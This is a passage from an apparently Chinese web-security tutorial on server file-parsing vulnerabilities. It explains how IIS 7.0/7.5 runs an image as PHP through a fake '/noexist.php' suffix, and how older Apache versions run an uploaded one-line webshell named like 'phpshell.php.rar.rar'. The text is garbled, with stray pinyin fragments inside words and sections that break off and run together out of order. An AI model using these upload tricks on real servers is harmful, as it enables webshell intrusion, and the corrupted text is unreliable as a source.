ì)將test.jpg當(dāng)做php進(jìn)行解析，其中noexist.php是不存在的文件（但后綴必須是.php），頁(yè)面返回如下圖所示從上圖可知test.jpg中的代碼得到了執(zhí)行。IIS7.0/7.5解析漏洞IIS7.0/7.5是對(duì)phpApache文件解析漏洞Apache對(duì)于文件名的解析是從后往前解析的，直到遇見(jiàn)一個(gè)apache認(rèn)識(shí)的文件類型為止，比如phpshell.php.rar.rar，由于apache不認(rèn)識(shí).rar文件類型，所以會(huì)一直遍歷后綴直到.php，然后認(rèn)為這是個(gè)php類型的文件，這樣的話可以上傳一個(gè)包含一句話木馬文件名類似phpshell.php.rar.rar的文件，訪問(wèn)該文件將會(huì)被當(dāng)成php文件解析執(zhí)行，具有此漏洞的版本包括：Apache2.2.11、Apache2.2.17、Apache2.2.6、Apache2.0.59、Apache2.2.8，接下來(lái)以Apache2.0.59為例，具體如下。Apache文件解析漏洞